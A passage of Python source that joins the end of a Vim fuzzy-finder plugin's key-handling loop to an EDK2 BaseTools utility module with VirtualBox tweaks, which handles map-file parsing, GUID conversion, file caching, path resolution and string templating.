selection = int( vim.eval(
'confirm("Action?", "&Edit\n&Split\n&Vsplit\n&Tabnew\n&Drop")' ) ) - 1
if selection < 0 or selection >= action_count:
selection = 0
action = actions[selection]
if self.accept(action) is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import sys
import string
import thread
import threading
import time
import re
import cPickle
import array
import shutil
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from DataType import *
from BuildToolError import *
from CommonDataClass.DataClass import *
from Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE|re.UNICODE)
## Dictionary used to store file time stamp for quick re-access
gFileTimeStampCache = {} # {file path : file time stamp}
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for line in lines:
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 2:
m = re.match('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$', line)
if m != None:
sections.append(m.groups(0))
for varname in varnames:
m = re.match("^([\da-fA-Fx]+) +[_]*(%s)$" % varname, line)
if m != None:
varoffset.append((varname, int(m.groups(0)[0], 16) , int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
secRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if re.match("^Start[' ']+Length[' ']+Name[' ']+Class", line):
status = 1
continue
if re.match("^Address[' ']+Publics by Value[' ']+Rva\+Base", line):
status = 2
continue
if re.match("^entry point at", line):
status = 3
continue
if status == 1 and len(line) != 0:
m = secRe.match(line)
assert m != None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m != None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 != None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1: Src = f1.read()
with open(TempFullPath, 'rb') as f2: Dst = f2.read()
if Src == Dst:
return RtPath
GlobalData.gTempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in gTempInfs
#
def ClearDuplicatedInf():
for File in GlobalData.gTempInfs:
if os.path.exists(File):
os.remove(File)
## callback routine for processing variable option
#
# This function can be used to process variable number of option values. The
# typical usage of it is specify architecure list on command line.
# (e.g. <tool> -a IA32 X64 IPF)
#
# @param Option Standard callback function parameter
# @param OptionString Standard callback function parameter
# @param Value Standard callback function parameter
# @param Parser Standard callback function parameter
#
# @retval
#
def ProcessVariableArgument(Option, OptionString, Value, Parser):
assert Value is None
Value = []
RawArgs = Parser.rargs
while RawArgs:
Arg = RawArgs[0]
if (Arg[:2] == "--" and len(Arg) > 2) or \
(Arg[:1] == "-" and len(Arg) > 1 and Arg[1] != "-"):
break
Value.append(Arg)
del RawArgs[0]
setattr(Parser.values, Option.dest, Value)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0,3,1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0,12,2):
Result = Result + ', 0x' + GuidList[4][Index:Index+2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory == None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory == None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Check if given file is changed or not
#
# This method is used to check if a file is changed or not between two build
# actions. It makes use a cache to store files timestamp.
#
# @param File The path of file
#
# @retval True If the given file is changed, doesn't exist, or can't be
# found in timestamp cache
# @retval False If the given file is changed
#
def IsChanged(File):
if not os.path.exists(File):
return True
FileState = os.stat(File)
TimeStamp = FileState[-2]
if File in gFileTimeStampCache and TimeStamp == gFileTimeStampCache[File]:
FileChanged = False
else:
FileChanged = True
gFileTimeStampCache[File] = TimeStamp
return FileChanged
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if not IsBinaryFile:
Content = Content.replace("\n", os.linesep)
if os.path.exists(File):
try:
if Content == open(File, "rb").read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
try:
if False: # VBox: Don't want python25.dll dependencies, original: if GlobalData.gIsWindows:
try:
from PyUtility import SaveFileToDisk
if not SaveFileToDisk(File, Content):
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData=File)
except:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
else:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
except IOError, X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s'%X)
return True
## Make a Python object persistent on file system
#
# @param Data The object to be stored in file
# @param File The path of file to store the object
#
def DataDump(Data, File):
Fd = None
try:
Fd = open(File, 'wb')
cPickle.dump(Data, Fd, cPickle.HIGHEST_PROTOCOL)
except:
EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
finally:
if Fd != None:
Fd.close()
## Restore a Python object from a file
#
# @param File The path of file stored the object
#
# @retval object A python object
# @retval None If failure in file operation
#
def DataRestore(File):
Data = None
Fd = None
try:
Fd = open(File, 'rb')
Data = cPickle.load(Fd)
except Exception, e:
EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
Data = None
finally:
if Fd != None:
Fd.close()
return Data
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
## Get all files of a directory
#
# @param Root: Root dir
# @param SkipList : The files need be skipped
#
# @retval A list of all files
#
def GetFiles(Root, SkipList=None, FullPath = True):
OriPath = Root
FileList = []
for Root, Dirs, Files in os.walk(Root):
if SkipList:
for Item in SkipList:
if Item in Dirs:
Dirs.remove(Item)
for File in Files:
File = os.path.normpath(os.path.join(Root, File))
if not FullPath:
File = File[len(OriPath) + 1:]
FileList.append(File)
return FileList
## Check if gvien file exists or not
#
# @param File File name or path to be checked
# @param Dir The directory the file is relative to
#
# @retval True if file exists
# @retval False if file doesn't exists
#
def ValidFile(File, Ext=None):
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False
if not os.path.exists(File):
return False
return True
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir)+1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
# VBox hack begin - Required for RAW reset vectors and logo bmps files outside the workspace.
if not NewFile and Dir == '' and os.path.isabs(File):
NewFile = os.path.normpath(File);
# VBox hack end.
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir)+1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
## Check if gvien file exists or not
#
#
def ValidFile2(AllFiles, File, Ext=None, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
NewFile = File
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False, File
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace)+1:]
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
NewFile = File.replace('$(EFI_SOURCE)', EfiSource)
NewFile = NewFile.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(NewFile)]
if NewFile != None:
return True, NewFile
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
return True, NewFile
# Last check the path with normal definitions
File = os.path.join(Dir, File)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
return True, NewFile
return False, File
## Check if gvien file exists or not
#
#
def ValidFile3(AllFiles, File, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
# Dir is current module dir related to workspace
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace)+1:]
NewFile = File
RelaPath = AllFiles[os.path.normpath(Dir)]
NewRelaPath = RelaPath
while(True):
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
File = File.replace('$(EFI_SOURCE)', EfiSource)
File = File.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
NewRelaPath = os.path.dirname(NewFile)
File = os.path.basename(NewFile)
#NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
#NewRelaPath = os.path.dirname(NewFile)
NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Last check the path with normal definitions
NewFile = AllFiles[os.path.normpath(os.path.join(Dir, File))]
if NewFile != None:
break
# No file found
break
return NewRelaPath, RelaPath, File
def GetRelPath(Path1, Path2):
FileName = os.path.basename(Path2)
L1 = os.path.normpath(Path1).split(os.path.normpath('/'))
L2 = os.path.normpath(Path2).split(os.path.normpath('/'))
for Index in range(0, len(L1)):
if L1[Index] != L2[Index]:
FileName = '../' * (len(L1) - Index)
for Index2 in range(Index, len(L2)):
FileName = os.path.join(FileName, L2[Index2])
break
return os.path.normpath(FileName)
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList):
for P in PackageList:
if CName in P.Guids:
return P.Guids[CName]
return None
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def ProtocolValue(CName, PackageList):
for P in PackageList:
if CName in P.Protocols:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def PpiValue(CName, PackageList):
for P in PackageList:
if CName in P.Ppis:
return P.Ppis[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder,Start,End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = ''
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return self.String
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String += "".join([S.Instantiate(Dictionary) for S in SectionList])
else:
self.String += AppendString
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join([S.Instantiate(Dictionary) for S in self._TemplateSectionList])
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress charaters
# @param CloseMessage The string printed after progress charaters
# @param ProgressChar The charater used to indicate the progress
# @param Interval The interval in seconds between two progress charaters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag == None:
Progressor._StopFlag = threading.Event()
## Start to print progress charater
#
# @param OpenMessage The string printed before progress charaters
#
def Start(self, OpenMessage=None):
if OpenMessage != None:
